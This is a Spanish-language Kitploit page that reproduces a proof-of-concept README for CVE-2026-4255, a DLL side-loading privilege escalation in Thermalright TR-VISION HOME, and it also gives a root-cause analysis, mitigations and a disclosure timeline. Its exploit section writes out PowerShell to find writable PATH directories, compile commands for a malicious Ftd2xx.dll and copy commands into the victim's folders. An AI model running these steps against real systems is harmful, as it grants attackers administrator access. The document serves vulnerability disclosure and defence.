Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-4255 — Prueba de concepto para CVE-2026-4255: escalada de privilegios mediante carga lateral de DLL en Thermalright TR-VISION HOME vía siembra de directorios en la ruta (PATH), con análisis completo de causa raíz y guía de mitigación. | Kitploit
Herramientas/GitHubGitHub/ard33/cve-2026-4255
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPapers e InvestigaciónAprendizaje y EducaciónExplotación de BinariosLabs y Práctica
GitHubard33/cve-2026-4255

CVE-2026-4255

Prueba de concepto para CVE-2026-4255: escalada de privilegios mediante carga lateral de DLL en Thermalright TR-VISION HOME vía siembra de directorios en la ruta (PATH), con análisis completo de causa raíz y guía de mitigación.

Ver Repositorio
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-4255 Thermalright TR-VISION HOME Elevación de Privilegios mediante Carga Lateral de DLL

Severidad: ALTA (CVSS 8.4)
CWE: CWE-829 Inclusion of Functionality from Untrusted Control Sphere
Publicado: 16/03/2026
CNA: Toreon
Versiones afectadas: Thermalright TR-VISION HOME ≤ 2.0.5 (Windows 64-bit)
Descubierto por: Ard33


Descripción

Thermalright TR-VISION HOME carga Ftd2xx.dll (biblioteca FTDI USB-to-serial) usando el orden de búsqueda de DLL predeterminado de Windows. Este orden incluye directorios escribibles por el usuario antes que ubicaciones protegidas del sistema. Dado que TR-VISION HOME siempre se ejecuta con privilegios administrativos y no realiza ninguna verificación de integridad o firma en las bibliotecas cargadas, un atacante que pueda escribir en cualquier directorio del PATH puede colocar una Ftd2xx.dll manipulada y hacer que se cargue con privilegios elevados la próxima vez que se inicie la aplicación.

No se requieren derechos administrativos para colocar la DLL. Un usuario con pocos privilegios puede explotar esto contra cualquier usuario que posteriormente inicie TR-VISION HOME con elevación.

Vector CVSS 4.0

root@kitploit:~
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
MétricaValor
Vector de AtaqueLocal
Complejidad de AtaqueBaja
Requisitos de AtaqueNinguno

Causa Raíz

La aplicación llama a LoadLibrary("Ftd2xx.dll") (o la importa implícitamente al cargarse) sin especificar una ruta completamente calificada. Windows resuelve la biblioteca recorriendo el orden de búsqueda definido en MSDN Orden de Búsqueda de Bibliotecas de Enlace Dinámico:

  1. El directorio desde el que se cargó la aplicación
  2. El directorio del sistema (C:\Windows\System32)
  3. El directorio del sistema de 16 bits
  4. El directorio de Windows
  5. El directorio de trabajo actual
  6. Directorios listados en la variable de entorno PATH ← explotable

Un atacante coloca Ftd2xx.dll en un directorio escribible por el usuario que aparezca en PATH antes que System32. C:\Users\<Usuario>\.local\bin) es uno de esos directorios y está presente en PATH por defecto, lo que lo convierte en una ubicación de colocación fiable.


Software Afectado

SoftwareVersiónPlataforma
Thermalright TR-VISION HOME≤ 2.0.5Windows x64

Probado en TR-VISION HOME 2.0.5 en Windows 11.


Prueba de Concepto

Prerrequisitos

  • Cualquier cuenta de usuario estándar de Windows (no se requieren derechos de administrador para colocar la DLL)
  • Un directorio escribible por el usuario presente en %PATH%
  • El usuario objetivo debe iniciar TR-VISION HOME (solicita elevación mediante UAC al inicio)

Pasos

1. Identificar un directorio PATH escribible

root@kitploit:~
$env:PATH -split ';' | Where-Object {
    if (-not $_ -or -not (Test-Path $_)) { return $false }
    try {
        $t = Join-Path $_ '.wrtest'
        [System.IO.File]:https://raw.githubusercontent.com/ard33/cve-2026-4255/HEAD/:Create($t).Close()
        Remove-Item $t -Force
        $true
    } catch { $false }
}

Un valor predeterminado fiable: C:\Users\<Usuario>\.local\bin

2. Compilar la DLL de la PoC

MinGW (cruzada o nativa):

root@kitploit:~
gcc -shared -o Ftd2xx.dll poc/Ftd2xx.c -Wl,--out-implib,Ftd2xx.lib

MSVC:

root@kitploit:~
cl /LD poc\Ftd2xx.c /Fe:Ftd2xx.dll

3. Colocar la DLL

Elija cualquier directorio escribible del paso 1. Dos valores predeterminados comunes:

root@kitploit:~
:: Directorio de scripts predeterminado de uv / pipx
copy Ftd2xx.dll "C:\Users\<victima>\.local\bin\Ftd2xx.dll"

:: Lanzador de Python (instalación estándar de Python)
copy Ftd2xx.dll "C:\Users\<victima>\AppData\Local\Programs\Python\Launcher\Ftd2xx.dll"

No se requiere elevación para este paso.

4. Desencadenar

La víctima inicia TR-VISION HOME (por ejemplo, desde el Menú Inicio o la bandeja del sistema). El aviso de UAC ejecuta la aplicación con privilegios administrativos. Durante la inicialización, Ftd2xx.dll se resuelve mediante el orden de búsqueda, la copia colocada se encuentra antes que System32, y el DllMain del atacante se ejecuta dentro del proceso elevado.

5. Resultado esperado

  • Aparece una ventana emergente confirmando que la DLL se cargó dentro del proceso elevado
  • Se crea C:\Users\Public\CVE-2026-4255_pwned.txt, que contiene:
    • ID del proceso de TR-VISION HOME
    • Confirmación de que TokenIsElevated = YES

Evidencia de captura de pantalla

Procmon mostrando TR-VISION HOME (PID 78940) buscando Ftd2xx.dll a través de directorios PATH — todos devuelven NAME NOT FOUND hasta que se resuelve la copia colocada:

Traza de Procmon

Ftd2xx.dll colocada en AppData\Local\Programs\Python\Launcher\ (fecha 26/12/2025 — día del descubrimiento):

DLL colocada en el Lanzador de Python

Símbolo del sistema elevado generado por la DLL cargada — la barra de título confirma contexto de Administrador:

Prueba de shell elevado

Versión 2.0.5 de TR-VISION HOME:

Versión


Mitigación

Para Thermalright:

  1. Cargar Ftd2xx.dll usando una ruta completamente calificada en tiempo de ejecución:
    root@kitploit:~
    LoadLibraryExA("C:\\Windows\\System32\\Ftd2xx.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
    
  2. Usar las banderas LOAD_LIBRARY_SEARCH_SYSTEM32 o LOAD_LIBRARY_SEARCH_APPLICATION_DIR con LoadLibraryEx.
  3. Verificar la firma digital de las bibliotecas cargadas mediante WinVerifyTrust.
  4. Habilitar el Modo de Búsqueda Segura de DLL (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode = 1), aunque esto no mitiga completamente la colocación basada en PATH.

Para usuarios (temporal):

  • Colocar la Ftd2xx.dll legítima (del paquete de controladores FTDI D2XX) directamente en el directorio de instalación de TR-VISION HOME (ej. C:\Program Files\TR-VISION HOME\). El directorio de la aplicación es la primera ubicación buscada, por lo que una copia legítima allí tiene prioridad sobre cualquier colocación basada en PATH.
  • No ejecutar TR-VISION HOME hasta que esté disponible una versión parcheada.

Cronograma

FechaEvento
26/12/2025Vulnerabilidad descubierta
27/12/2025Contactado el vendedor (Thermalright) a través de canales de soporte
16/03/2026Divulgación pública CVE-2026-4255 asignado por Toreon CNA

Referencias

  • NVD CVE-2026-4255
  • CWE-829 Inclusion of Functionality from Untrusted Control Sphere
  • MSDN DLL Search Order
  • FTDI Ftd2xx Driver
  • Thermalright TR-VISION HOME

Descargo de Responsabilidad

Esta prueba de concepto se proporciona únicamente con fines educativos y de investigación. La carga útil de la PoC es intencionadamente benigna: escribe un archivo de texto y muestra un cuadro de mensaje. Úsela solo contra sistemas que le pertenezcan o para los que tenga permiso explícito por escrito para realizar pruebas. El autor no asume ninguna responsabilidad por el uso indebido.

Descargar herramienta
Privilegios RequeridosNinguno
Interacción del UsuarioActiva (la víctima ejecuta la aplicación)